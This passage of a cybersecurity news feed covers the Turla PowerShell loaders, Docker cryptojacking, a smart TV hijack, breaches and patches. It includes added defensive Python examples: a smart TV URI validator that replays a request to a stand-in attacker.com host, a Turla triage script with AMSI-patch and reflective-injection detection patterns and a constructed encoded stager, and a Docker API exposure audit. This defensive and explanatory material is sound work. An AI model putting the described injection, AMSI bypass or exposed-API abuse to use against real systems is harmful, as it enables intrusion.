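"""Hardened handling of /remote/media_control?action=setUri (added example, not the vendor's code)."""
import hmac
from typing import Dict, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed allowlist of (scheme, host, port) origins the TV owner configured as media sources.
ALLOWED_MEDIA_ORIGINS = {("http", "192.168.1.10", 8080), ("https", "media.example.lan", 443)}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PLAYLIST_EXTENSIONS = (".m3u8", ".mp4")


def is_allowed_media_uri(uri: str, allowed_origins=ALLOWED_MEDIA_ORIGINS) -> bool:
    """Accept only http(s) URIs whose origin is on the allowlist.  Rejects other
    schemes (file:, etc.), userinfo tricks like http://192.168.1.10@attacker.com/,
    and malformed ports."""
    try:
        parts = urlsplit(uri)
        port = parts.port  # raises ValueError for a non-numeric port
    except ValueError:
        return False
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if not parts.path.lower().endswith(ALLOWED_PLAYLIST_EXTENSIONS):
        return False
    return (parts.scheme, parts.hostname.lower(), port) in allowed_origins


def parse_query(query_string: str) -> Dict[str, str]:
    return dict(parse_qsl(query_string, keep_blank_values=True))


def handle_media_control(query_string: str, presented_token: str, expected_token: str) -> Tuple[int, str]:
    """(HTTP status, message) as a hardened handler would answer.  The session token
    is a stand-in for whatever authentication the device ties to its remote UI."""
    if not presented_token or not hmac.compare_digest(presented_token, expected_token):
        return 401, "authentication required"
    query = parse_query(query_string)
    if query.get("action") != "setUri":
        return 400, "unsupported action"
    if not is_allowed_media_uri(query.get("uri", "")):
        return 403, "uri is not an allowed media source"
    return 200, "ok"


if __name__ == "__main__":
    token = "constructed-session-token"
    # The request from the write-up, replayed without credentials and then with them.
    print(handle_media_control("action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8", "", token))
    print(handle_media_control("action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8", token, token))
    print(handle_media_control("action=setUri&uri=http://192.168.1.10:8080/live/channel1.m3u8", token, token))
```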

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original post at:

https://www.inputzero.io/2019/06/hacking-smart-tv.html


Pierluigi Paganini

(SecurityAffairs – hacking, Smart Cloud TV)


Google is taking action on deceptive installation tactics for Chrome Browser Extensions

Google aims at eliminating the use of deceptive installation tactics among Chrome browser extensions introducing a new policy.

Google announced a new policy for Chrome browser extensions to eliminate the use of deceptive installation tactics.

The additional changes are part of Project Strobe, presented by Google in October 2018 in the aftermath of the data breach that exposed the data of over 500,000 Google+ users.

Google aims at ensuring that all Chrome extensions are trustworthy by default

Google says that users’ trust in extensions is greatly influenced by the path to downloading an extension. A single bad experience could affect users’ interest in these applications.

“Setting the right expectations for what an extension does, from the start, helps create a healthy and thriving ecosystem of extensions, developers, and passionate users.” states Google.

“Last year, to improve user transparency we deprecated inline installation and began requiring all extension installs to go through the Chrome Web Store. This change has helped reduce user complaints about unwanted extensions by 18 percent.”

Unfortunately, Google still receives user feedback about deceptive extension install flows. The company is prohibiting extensions that benefit from deceptive install tactics with the following policy:

Extensions must be marketed responsibly. Extensions that use or benefit from deceptive installation tactics will be removed from the Chrome Web Store.

Deceptive installation tactics include:

  • Unclear or inconspicuous disclosures on marketing collateral preceding the Chrome Web Store item listing.
  • Misleading interactive elements as part of your distribution flow. This includes misleading call-to-action buttons or forms that imply an outcome other than the installation of an extension.
  • Adjusting the Chrome Web Store item listing window with the effect of withholding or hiding extension metadata from the user.

Developers are asked to audit their install traffic to ensure it is compliant before July 1st, 2019.

Google also introduced two additional restrictions on Chrome browser extensions; the most important one requires the use of the “minimum set of permissions necessary” when asking for access to data. Below are the two new Chrome Web Store policies:

  1. We’re requiring extensions to only request access to the appropriate data needed to implement their features. All extensions will now be required to use the “minimum set of permissions necessary” when asking for access to data. If more than one permission could be used to implement a feature, developers must ask for the permission that gives them access to the least amount of data.
  2. We’re requiring more extensions to post privacy policies, including extensions that handle personal communications and user-provided content. The company is requiring more extensions to post privacy policies in the Chrome Web Store. While this requirement was already in place for extensions that require access to “personal and sensitive user data,” Google is now extending it to Chrome browser extensions that need access to personal communications or user-provided content.



Pierluigi Paganini

(SecurityAffairs – Chrome Browser Extensions, Google)


Google outages in Eastern US affected Gmail, G-Suite, YouTube, and more

Network problems on the East Coast of the US caused massive outages in Google Cloud and the Google Compute Engine, impacting all the services that rely on them.

The network issue caused connection problems for several Google services, including G Suite, Gmail, and YouTube. Users also experienced problems accessing third-party services such as Snapchat and Discord.

I discovered the problem because I was not able to access Analytics data for my blog. I immediately visited Google’s service status page, which was reporting a network congestion issue affecting Google Cloud Networking and the Google Compute Engine on the east coast of the U.S.

“We continue to experience high levels of network congestion in the eastern USA, affecting multiple services in Google Cloud, G Suite and YouTube. Users may see slow performance or intermittent errors. Our engineering teams have completed the first phase of their mitigation work and are currently implementing the second phase, after which we expect to return to normal service. We will provide an update by Sunday, 2019-06-02 16:00 US/Pacific.” reported the company service status page.

As usual, the next step is to visit the DownDetector.com website to better understand the extent of the problem. The page of the website for Google Cloud outage map on DownDetector.com confirmed the outages affecting the eastern U.S. as well as some users in Europe and in San Francisco.


At the time of writing, Google has resolved the issue, as reported on the service status page, and is investigating the incident:

“The network congestion issue in eastern USA, affecting Google Cloud, G Suite, and YouTube has been resolved for all affected users as of 4:00pm US/Pacific.” states Google.

“We will conduct an internal investigation of this issue and make appropriate improvements to our systems to help prevent or minimize future recurrence. We will provide a detailed report of this incident once we have completed our internal investigation. This detailed report will contain information regarding SLA credits.”



Pierluigi Paganini

(SecurityAffairs – Google outages, IT)


Threat actors abuse Microsoft Azure to Host Malware and C2 Servers

Microsoft Azure cloud services are being abused by threat actors to host malware and as command and control (C&C) servers.

Threat actors look with great interest at cloud services that could be abused for several malicious purposes, like storing malware or implementing command and control servers.

Now it seems to be Microsoft Azure’s turn: recently experts reported several attacks leveraging the platform to host tech-support scam and phishing templates.


Security researchers already spotted some malware hosted on the Microsoft Azure platform.

Researchers at AppRiver observed attackers deploying malware on the Microsoft Azure platform; the bad news is that the malicious files had still not been removed weeks later, as of May 29.

“Now the attacks have escalated to malware being hosted on the Azure service. Not only is Azure hosting malware, it is also functioning as the command and control infrastructure for the malicious files” reads the analysis published by AppRiver.

“On May 11, 2019, malware researchers @JayTHL & @malwrhunterteam discovered the malicious software on Azure. It was reported to Microsoft on May 12 for abuse via ticket #SIR0552640.  However, the original malware (plus additional samples uploaded since) still resided on the Azure site as of May 29, 2019 – 17 days later.”

Experts pointed out that Azure is failing to detect the malware hosted on Microsoft’s servers.

“No service is infallible to being attacked or exploited. It’s evident that Azure is not currently detecting the malicious software residing on Microsoft’s servers. However, if a user attempts to download the executables, Windows Defender does detect the malicious files.”

In one case, a sample named searchfile.exe was uploaded to VirusTotal on April 26, 2019. Even if Windows Defender detects the malware, its presence on Azure is not currently blocked. Unfortunately, experts reported many other similar cases.

Experts believe that this trend will continue to grow, threat actors will not only abuse Microsoft Azure, but other cloud services (i.e. Google Drive, Dropbox, and Amazon) will be exploited by attackers to avoid detection.



Pierluigi Paganini

(SecurityAffairs – Microsoft Azure, hacking)


Leicester City Football Club disclosed a card breach

Leicester City Football Club disclosed a card breach that affected its website, hackers stole payment card data, including card numbers and CVVs.

Leicester City Football Club revealed that hackers breached its online shop (https://shop.lcfc.com/) and stole the payment card data of customers who bought products there, including card numbers and CVVs.


According to the club, the card breach affected some users between April 23 and May 4, the company already notified the supporters whose details were compromised.

The club also informed the authorities and the Information Commissioner’s Office (ICO), and launched an immediate investigation.

“Upon discovery of the breach, the security of our retail platform was immediately restored and appropriate measures were taken to ensure the security of all other online assets.” reads the statement issued by the company.

Exposed data includes card number, name of card holder, expiry date and CVV.

“Technical investigations are still ongoing, but we can confirm that as a result of the incident your payment card information was compromised. This includes your card number, name of card holder, expiry date and CVV. We can confirm that your SecureCode was not compromised. That information is needed to attempt to conduct transactions using your account.” reads the email sent to the customers.

At the time of writing, there is no information about the attack and the way hackers breached the website of the English club; it is also not clear how many supporters have been impacted.



Pierluigi Paganini

(SecurityAffairs – Leicester City Football Club, card breach)


ProtonMail denies that it spies on users for government agencies

The popular privacy-focused email service ProtonMail has been accused of offering voluntarily real-time surveillance assistance to law enforcement.

The popular privacy-focused email service ProtonMail made the headlines because it has been accused of supporting real-time surveillance carried out by law enforcement.


On May 10, while Stephan Walder, a public prosecutor and head of the Cybercrime Competence Center in Switzerland’s Canton of Zurich, was giving a presentation at an event, the Swiss lawyer Martin Steiger live-tweeted that Walder had incidentally mentioned ProtonMail as a service provider that voluntarily offers support to law enforcement.

Steiger said that ProtonMail offers voluntary support for real-time surveillance without requiring an order from a federal court.

“Email service provider ProtonMail, based in Switzerland, offers assistance for real-time surveillance: Voluntarily!” reads the post published by Steiger.

Steiger pointed out the company provided metadata and so-called secondary data that could be used by law enforcement and intelligence agencies for surveillance purposes.

“Metadata or secondary data that is available must be provided. On the other hand, ProtonMail, as a provider of derived communication services, has in principle no obligation for real-time surveillance. Art. 26 para. 4 SPTA provides such obligation only for providers of telecommunications services such as Swisscom or UPC.” continues the post.

“There is currently no evidence that ProtonMail is a provider of derived communications services with more extensive surveillance obligations. ProtonMail would therefore not have to voluntarily provide assistance for real-time surveillance.”

Steiger pointed out that ProtonMail is subject to Swiss surveillance law, but not to the more extensive real-time surveillance obligations imposed on telecommunications service providers.

ProtonMail’s own transparency report shows that the company can enable real-time surveillance (IP logging) for the authorities when ordered to; it also mentions a current case:

“In April 2019, at the request of the Swiss judiciary in a case of clear criminal conduct, we enabled IP logging against a specific user account which is engaged in illegal activities which contravene Swiss law. Pursuant to Swiss law, the user in question will also be notified and afforded the opportunity to defend against this in court before the data can be used in criminal proceedings.”

Walder said that Steiger misunderstood his speech, but the lawyer maintains that the situation is exactly the one he described in his post.

ProtonMail denied Steiger’s claims and published a post to clarify that it only assists the authorities when presented with an order from a Swiss court or prosecutor.

“ProtonMail does not voluntarily offer assistance as alleged. We only do so when ordered by a Swiss court or prosecutor, as we are obligated to follow the law in all criminal cases. Furthermore, ProtonMail’s end-to-end encryption means we cannot be forced by a court to provide unencrypted message contents.” reads the blog post.

“ProtonMail cannot be used for any purposes that are illegal under Swiss law. Not only is this against our terms and conditions, we are also obligated by law to assist police investigations in criminal cases. However, the claim that we do this voluntarily is entirely false.”

According to ProtonMail, Steiger’s interpretation of the law is different from the one taken by the Swiss authorities.

The company added that it does not agree with the interpretation taken by some branches of the Swiss government: “Therefore, we have asked the Swiss Federal Administrative Tribunal to rule on the appropriate interpretation of the law, and we will appeal to the Swiss Supreme Court if necessary.”

ProtonMail also threatened to take legal action for defamation pursuant to art. 174 of the Swiss Criminal Code.



Pierluigi Paganini

(SecurityAffairs – privacy, surveillance)


Security Affairs newsletter Round 216 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.



Police seized Bestmixer, the mixing service washed at least $200 million in a year
Remarks on NATO and its approach to the cyber offensive
Sectigo says that most of certificates reported by Chronicle analysis were already revoked
BlueKeep scans observed from exclusively Tor exit nodes
Crooks leverage .htaccess injector on Joomla and WordPress sites for malicious redirects
First American Financial exposed 16 years worth of personal and financial documents
Hacker breached Perceptics, a US maker of license plate readers
APT10 is back with two new loaders and new versions of known payloads
DuckDuckGo Address Bar Spoofing
Internet scans found nearly one million systems vulnerable to BlueKeep
Shade Ransomware is very active outside of Russia and targets more English-speaking victims
Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw
All Docker versions affected by an unpatched race condition issue
Google white hat hacker found code execution flaw in Notepad
HawkEye Keylogger is involved in attacks against business users
News aggregator Flipboard disclosed a data breach
TA505 is expanding its operations
Using Public Wi-Fi? Your data can be hacked easily! Here’s How…
Checkers double drive-thru restaurants chain discloses card breach
Convert Plus WordPress plugin flaw allows hackers to create Admin accounts
Emissary Panda APT group hit Government Organizations in the Middle East
Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers
VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs
0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler
HiddenWasp, a sophisticated Linux malware borrows from Mirai and Azazel
Microsoft warns for the second time of applying BlueKeep patch
Security expert shows how to bypass macOS Gatekeeper
The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains
Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows
Cryptojacking campaign uses Shodan to scan for Docker hosts to hack
GandCrab operators are shutting down their operations
Russian military plans to replace Windows with Astra Linux



Pierluigi Paganini

(SecurityAffairs – newsletter)


ESET analyzes Turla APT’s usage of weaponized PowerShell

Turla, the Russia-linked cyberespionage group, is weaponizing PowerShell scripts and is using them in attacks against EU diplomats.

Turla (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON), the Russia-linked APT group, is using weaponized PowerShell scripts in attacks aimed at EU diplomats.

The Turla group has been active since at least 2007, targeting government organizations and private businesses.

The list of previously known victims is long and also includes the Swiss defense firm RUAG, the US Department of State, and the US Central Command.

Turla is back: in a recent wave of attacks, the cyberspies targeted diplomatic entities in Eastern Europe.

“To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. This allows them to bypass detection that can trigger when a malicious executable is dropped on disk.” reads the report published by ESET.

Because the PowerShell scripts load and execute the malicious executables and libraries directly in memory, no malicious executable is ever written to disk, which defeats file-based detection.

Turla first used PowerShell in 2018, when experts from Kaspersky Lab collected evidence of overlaps between the activity of the Russian APT groups Turla and Sofacy.


Kaspersky Lab said the APT was experimenting with PowerShell in-memory loading to bypass security protections; at the time the loader used by the cyberspies was based on the legitimate PoshSec-Mod software, but bugs in the code caused it to crash often.

ESET believes that now the problems have been solved and the Turla threat actors leverage the PowerShell scripts to load an array of malware.

“The PowerShell scripts are not simple droppers; they persist on the system as they regularly load into memory only the embedded executables.” continues the report.

“We have seen Turla operators use two persistence methods:

  • A Windows Management Instrumentation (WMI) event subscription
  • Alteration of the PowerShell profile (profile.ps1 file).”

When the persistence is implemented through WMI, attackers create two WMI event filters and two WMI event consumers. The consumers are command lines launching base64-encoded PowerShell commands that load a PowerShell script stored in the Windows registry.

The second method consists of altering the PowerShell profile, a script that runs every time PowerShell starts.

In both cases the payloads stored in the registry are decrypted with the 3DES algorithm. Once decrypted, a PowerShell reflective loader comes into action.

“The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework” reads the analysis.

“The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system,”

The attackers avoid injecting into processes that belong to security products, such as the Kaspersky anti-virus software.

In some samples, Turla attackers have modified the PowerShell script in order to bypass the Antimalware Scan Interface (AMSI) implemented by Windows.

“This is an interface allowing any Windows application to integrate with the installed antimalware product. It is particularly useful for PowerShell and macros.” continues the report.

“They did not find a new bypass but re-used a technique presented at Black Hat Asia 2018 in the talk The Rise and Fall of AMSI. It consists of the in-memory patching of the beginning of the function AmsiScanBuffer in the library amsi.dll.”

With the beginning of AmsiScanBuffer patched in memory, the antimalware product never receives the buffer to scan, so the content of the PowerShell script is not inspected at all.
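The two persistence methods and the AMSI patch described above all leave artifacts that can be inspected on the host: the command line stored in each WMI CommandLineEventConsumer and the contents of the PowerShell profile. The following Python script, added here as an example and not code from ESET or from the Turla toolset, shows the triage logic a responder would run over such an export: it decodes payloads hidden behind -EncodedCommand (base64 of UTF-16LE) and flags the behaviours the report describes (a script pulled from the registry, TripleDES decryption, Invoke-ReflectivePEInjection, references to AmsiScanBuffer). The sample records, the registry key path and the script fragments are constructed for the example and are assumptions, not real Turla artifacts.

```python
import base64
import re

# Indicators drawn from the behaviour ESET describes: script body pulled from
# the registry, 3DES decryption, reflective PE loading, AMSI patching.
INDICATORS = {
    "registry_payload": re.compile(r"Get-ItemProperty\b.*\bHK(?:LM|CU):", re.I | re.S),
    "3des": re.compile(r"TripleDES", re.I),
    "reflective_loader": re.compile(r"Invoke-ReflectivePEInjection", re.I),
    "amsi_patch": re.compile(r"AmsiScanBuffer", re.I),
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the script text hidden behind -EncodedCommand (base64 of UTF-16LE),
    or the command line unchanged when it carries no encoded payload."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def classify(text):
    """Names of the indicators present in a command line or profile script."""
    script = decode_encoded_command(text)
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def triage(records):
    """records: (source, text) pairs, e.g. ('wmi:consumer:<name>', '<CommandLineTemplate>').
    Returns only the records that carry at least one indicator."""
    findings = []
    for source, text in records:
        hits = classify(text)
        if hits:
            findings.append((source, hits))
    return findings


def encode_for_powershell(script):
    """Build a -EncodedCommand argument the way an attacker would; used here only
    to construct the sample record below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample inventory. The key path HKLM:\SOFTWARE\Example\Cache and the
# script fragments are assumptions for the example, not real Turla artifacts.
STAGER = (
    "$b=(Get-ItemProperty HKLM:\\SOFTWARE\\Example\\Cache).Blob;"
    "$k=New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;"
    "Invoke-ReflectivePEInjection -PEBytes $pe -ProcId $pid"
)
SAMPLE_RECORDS = [
    ("wmi:consumer:SCCMInventory",
     "powershell.exe -NoProfile -Command Get-CimInstance Win32_OperatingSystem"),
    ("wmi:consumer:WindowsUpdater",
     "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(STAGER)),
    ("profile:C:\\Users\\alice\\Documents\\WindowsPowerShell\\profile.ps1",
     "$p=[Kernel32]::GetProcAddress([Kernel32]::LoadLibrary('amsi.dll'),'AmsiScanBuffer')"),
]

if __name__ == "__main__":
    for source, hits in triage(SAMPLE_RECORDS):
        print(f"{source}: {', '.join(hits)}")
```

On a live Windows host the records would come from the CommandLineEventConsumer instances in the root\subscription namespace (together with their __EventFilter and __FilterToConsumerBinding objects) and from the profile.ps1 files of every user and of the system; the decoding step matters because the indicators only become visible after the base64 layer is removed.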

The PowerShell loader is used to launch malware; one of these payloads is a backdoor based on the RPC protocol.

Turla also has a lightweight PowerShell backdoor in its arsenal, tracked as PowerStallion, that uses cloud storage as its C2 server.

A few weeks ago, ESET researchers discovered a Turla backdoor tracked as LightNeuron, specifically developed to hijack Microsoft Exchange mail servers.

ESET confirmed that the PowerShell scripts have been used in campaigns aimed at political targets in Eastern Europe. According to the researchers, the same scripts have also been used against other targets in Western Europe and the Middle East.

“Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools. The payloads delivered by the PowerShell scripts, the RPC backdoor and PowerStallion, are actually very customized. Our recent analysis of Turla LightNeuron is additional proof that this group is still developing complex, custom malware.” concludes the report.

The ESET report includes technical details and IoCs associated with the recent attacks.


Pierluigi Paganini

(SecurityAffairs – Turla, hacking)



GandCrab operators are shutting down their operations

GandCrab first appeared in the threat landscape in early 2018 and continuously evolved over time. Now operators are shutting down their operations.

In early 2018, experts at the cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab, advertised in Russian hacking communities on the dark web. Researchers noticed that its authors leveraged the RIG and GrandSoft exploit kits to distribute the malware.

In little more than a year its operators released several versions with numerous enhancements, but now they are shutting down their operation and affiliates are being told to stop distributing the ransomware.

In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.

Security researchers Damian and David Montenegro, who have followed the evolution of GandCrab since its appearance, reported that the GandCrab operators announced their decision to shut down in a post on a popular hacking forum:

The operators claimed to have generated more than $2 billion in ransom payments, earning on average $2.5 million per week, and to have personally netted $150 million, which they say they have now invested in legal activities.


Experts, however, doubt the $2 billion figure; below an excerpt from a post published by Bleeping Computer:

“While the operators behind GandCrab most likely made many millions of dollars, the claims of $2 billion in ransom payments are very likely to be untrue.”

The operators will no longer promote the GandCrab ransomware and have asked affiliates to stop distributing it within 20 days.

They are also warning victims that time is running out and that they have to pay the ransom as soon as possible or lose their files forever.

It is not clear whether the operators will release the decryption keys after they go out of business.

Stay tuned …


Pierluigi Paganini

(SecurityAffairs – GandCrab ransomware, malware)



Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows

Apple released security updates for Windows versions of iTunes and iCloud, to address recently disclosed SQLite and WebKit security flaws.

Apple released security updates to address recently disclosed SQLite and WebKit security vulnerabilities affecting Windows versions of iTunes and iCloud.

Apple released iTunes for Windows 12.9.5, which addresses a total of 25 flaws: four SQLite issues and 21 vulnerabilities in WebKit.

Apple addressed the SQLite vulnerabilities tracked as CVE-2019-8577 and CVE-2019-8602 that could be exploited by an application to gain elevated privileges.

Another SQLite bug, tracked as CVE-2019-8600, is a memory corruption vulnerability that could be exploited to execute arbitrary code by sending a maliciously crafted SQL query to the vulnerable installation.

The fourth SQLite flaw, tracked as CVE-2019-8598, is an input validation issue that could allow an application to read restricted memory.

All the SQLite issues were reported by Omer Gull of Check Point Research.

The CVE-2019-8607 flaw in WebKit is an out-of-bounds read that could lead to the disclosure of process memory when processing maliciously crafted web content. The flaw was reported by Junho Jang and Hanul Choi of LINE Security Team.

The other flaws in WebKit addressed by Apple could lead to arbitrary code execution during the processing of maliciously crafted web content.  

The security advisory published by Apple is available here.

The tech giant also released iCloud for Windows 7.12 to address all these security issues. 


Pierluigi Paganini

(SecurityAffairs – Apple, iCloud, iTunes)


Cryptojacking campaign uses Shodan to scan for Docker hosts to hack

A new cryptojacking campaign was spotted by experts at Trend Micro, crooks are using Shodan to scan for Docker hosts with exposed APIs.

Threat actors are using the popular Shodan search engine to find Docker hosts and abuse them in a cryptojacking campaign. The attackers leverage self-propagating Docker images that carry Monero miners and scripts that use Shodan to find other vulnerable installs and compromise them.

The experts discovered the attacks after setting up a honeypot that simulated a Docker host with an exposed API.

“We discovered that the images are first deployed using a script (ubu.sh, detected as PUA.Linux.XMRMiner.AA.component) that checks hosts with publicly exposed APIs. It then uses Docker commands (POST /containers/create) to remotely create the malicious container. This script also starts an SSH daemon inside the container for remote communication.” reads the analysis published by Trend Micro.

“The script then calls a Monero coin-mining binary, darwin (detected as PUA.Linux.XMRMiner.AA), to run in the background. As with all cryptocurrency miners, it uses the resources of the host system to mine cryptocurrency (Monero in this instance) without the owner’s knowledge.”


The scripts used in this campaign look for vulnerable hosts via Shodan: they search for hosts with TCP port 2375 (the unencrypted Docker daemon API) open and, after brute-forcing them, deploy more infected containers on the host.

An exposed API lets the attacker run the same operations a local Docker administrator can: manage containers and, of course, deploy infected images from a Docker Hub repository under their control.
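The root cause on the victim side is a daemon listening on a TCP socket without client-certificate verification, which is the configuration the Shodan queries are looking for. The Python script below, added here as an example and not part of the Trend Micro research, shows the audit a practitioner can run against a dockerd configuration: it collects the listeners from the `hosts` key of daemon.json and from the `-H`/`--host` flags of a systemd ExecStart line, and reports every TCP listener that is not protected by `tlsverify`. The two configurations it checks (a weak `-H tcp://0.0.0.0:2375` beside a hardened daemon.json on port 2376 with TLS) and the certificate paths are constructed for the example.

```python
import json
import shlex
from urllib.parse import urlsplit


def listeners(daemon_json_text=None, exec_start=None):
    """Collect the endpoints dockerd will listen on and whether client-certificate
    verification is on. Reads the 'hosts'/'tlsverify' keys of daemon.json and the
    -H/--host/--tlsverify flags of a systemd ExecStart line. (dockerd refuses to
    start when 'hosts' is set in both places, so normally only one source is used.)"""
    hosts, tlsverify = [], False
    if daemon_json_text:
        cfg = json.loads(daemon_json_text)
        hosts += cfg.get("hosts", [])
        tlsverify = tlsverify or bool(cfg.get("tlsverify", False))
    if exec_start:
        args = shlex.split(exec_start)
        i = 0
        while i < len(args):
            a = args[i]
            if a in ("-H", "--host") and i + 1 < len(args):
                hosts.append(args[i + 1])
                i += 1
            elif a.startswith("--host="):
                hosts.append(a.split("=", 1)[1])
            elif a.startswith("-H") and len(a) > 2:       # -Htcp://... form
                hosts.append(a[2:])
            elif a in ("--tlsverify", "--tlsverify=true"):
                tlsverify = True
            i += 1
    return hosts, tlsverify


def audit(daemon_json_text=None, exec_start=None):
    """One finding per TCP listener without tlsverify. Every client that can reach
    such a port is effectively root on the host: it can POST /containers/create
    with any bind mount and start the container."""
    findings = []
    hosts, tlsverify = listeners(daemon_json_text, exec_start)
    for h in hosts:
        if not h.startswith("tcp://"):
            continue                                    # unix:// and fd:// are local only
        if tlsverify:
            continue                                    # mutual TLS: clients need a signed cert
        host = urlsplit(h).hostname or "0.0.0.0"        # a bare 'tcp://' binds all interfaces
        loopback = host in ("localhost", "::1") or host.startswith("127.")
        findings.append({
            "endpoint": h,
            "issue": "unauthenticated-local-api" if loopback else "unauthenticated-remote-api",
        })
    return findings


# Constructed configurations, not taken from any host in the report.
WEAK_EXEC_START = "/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    print("weak:", audit(exec_start=WEAK_EXEC_START))
    print("hardened:", audit(daemon_json_text=HARDENED_DAEMON_JSON))
```

A loopback listener without TLS is reported separately because it is still reachable by every local user and by any process that can open a TCP connection on the host; the only configuration the audit accepts silently is a Unix socket or a TCP listener with `tlsverify` enabled.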

The analysis of the logs and of the traffic to and from the honeypot revealed that the attackers used a container from a public Docker Hub repository named zoolu2. Researchers discovered that the repository contained nine images comprising custom-made shells, Python scripts, configuration files, as well as Shodan and cryptocurrency-mining binaries.

The good news is that Docker discovered the same repository independently and took it offline.

The same threat actors also used another Docker Hub repository, associated with the ‘marumira’ account, in previous attacks. Once this account was deactivated, the threat actors moved to zoolu2.

While the attackers launch a scanning process for Docker hosts to compromise, a custom built Monero coin-mining binary is executed in the background.

“An interesting characteristic of the attack is that it uses a cryptocurrency miner that it is being built from scratch instead of an existing one.” continues the report.

Every time an exposed Docker host is discovered, it is added to a list (the iplist.txt file), which the attackers then deduplicate. The script also checks whether the Docker host already runs a cryptocurrency-mining container and deletes it if present.

The list is sent to the C2 servers, which deploy additional containers to the exposed hosts it contains.

Attacks like the one detected by Trend Micro are not new: a similar campaign was spotted by researchers from Imperva in early March.

The same malicious campaign was also analyzed by the Alibaba Cloud Security team that tracked it as Xulu.

“These threats are often successful, not only due to the exploitation of flaws and vulnerabilities in the container software but also due to misconfiguration, which remains a constant challenge for organizations. In this case, the hosts that have exposed APIs are not just victims of cryptocurrency-mining operations — they also contribute further to the distribution of the infected containers.” concludes Trend Micro.

“Unwanted cryptocurrency-mining activity can lead to additional resource load for the targets. In this example, if the Docker host is running on internal infrastructure, other hosts can also suffer. On the other hand, if the Docker host is using a cloud service provider, the organization can accrue additional charges due to the higher resource usage.”



Pierluigi Paganini

(SecurityAffairs – Docker, hacking)


Russian military plans to replace Windows with Astra Linux

The Russian army seems to be in the process of replacing the Windows system with the Debian-based Linux distribution Astra Linux.

Cyber security seems to be subverting globalization: governments are working to develop their own technology, fearing espionage and sabotage by foreign states.

The Russian military is in the process of replacing the Windows operating system with the Linux distribution Astra Linux.

Astra Linux is a Debian-based distro developed in Russia by the Scientific/Manufacturing Enterprise RusBITech about ten years ago.

“Astra Linux is a Russian Linux-based computer operating system developed to meet the needs of the Russian army, other armed forces and intelligence agencies. It provides data protection up to the level of “top secret” in Russian classified information grade.” reads the Wikipedia page. “It has been officially certified by Russian Defense Ministry, Federal Service for Technical and Export Control and Federal Security Service.”

The Astra Linux distribution was initially used only by private companies; Russian government agencies started using it after it was certified to handle classified information.

Recently the Russian Federal Service for Technical and Export Control (FSTEC) granted Astra Linux the security clearance of “special importance.” This level of authorization allows the use of the Linux OS in Russian Government offices with the highest standards of data privacy and the highest degree of secrecy.

The certification was granted for Astra Linux Special Edition version 1.6, (aka Smolensk).

The adoption of the Astra Linux distro in government environments will reduce the cost of the security verification performed by the Russian armed forces. Software and hardware qualification remains a crucial problem for almost any government that fears the presence of hidden backdoors.


In the past, Russian Army officials raised concerns about the possible presence of hidden backdoors planted in the Windows operating system by U.S. intelligence agencies.

The move to Astra Linux was announced in January 2018 by the Russian Ministry of Defence.

A similar decision was also announced by the Chinese government, which plans to stop using the Microsoft operating system, especially after the recent ban on Chinese 5G technologies imposed by many western countries.


Pierluigi Paganini

(SecurityAffairs – Astra, Russia)


0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler

Researchers at 0patch released a temporary micropatch for the unpatched BearLPE local privilege escalation zero-day flaw in Windows 10.

Experts at 0patch released a micropatch that temporarily fixes a still-unpatched local privilege escalation flaw in Windows 10 without requiring a reboot.

The zero-day vulnerability, dubbed BearLPE, was recently disclosed by the security researcher SandboxEscaper.

A video published by 0patch shows how the micropatch, composed of just five instructions, works on a vulnerable machine.

The exploit published by the researcher triggers a flaw in the Task Scheduler of Windows 10.

SandboxEscaper discovered that, even starting with limited privileges, it is possible to obtain SYSTEM rights by invoking a specific Task Scheduler function. SandboxEscaper published a video PoC of the Windows zero-day that shows how to trigger it on Windows x86.

Will Dormann, vulnerability analyst at CERT/CC, confirmed that the zero-day works on a fully patched (May 2019) Windows 10 x86 system; according to Dormann, the exploit is 100% reliable on x86 systems and needs to be recompiled for x64 machines.

“When you run Windows XP schtasks.exe on Windows 10, legacy RPC functions are called – which in turn call the current ones, such as SchRpcSetSecurity,” explained 0patch co-founder Mitja Kolsek.

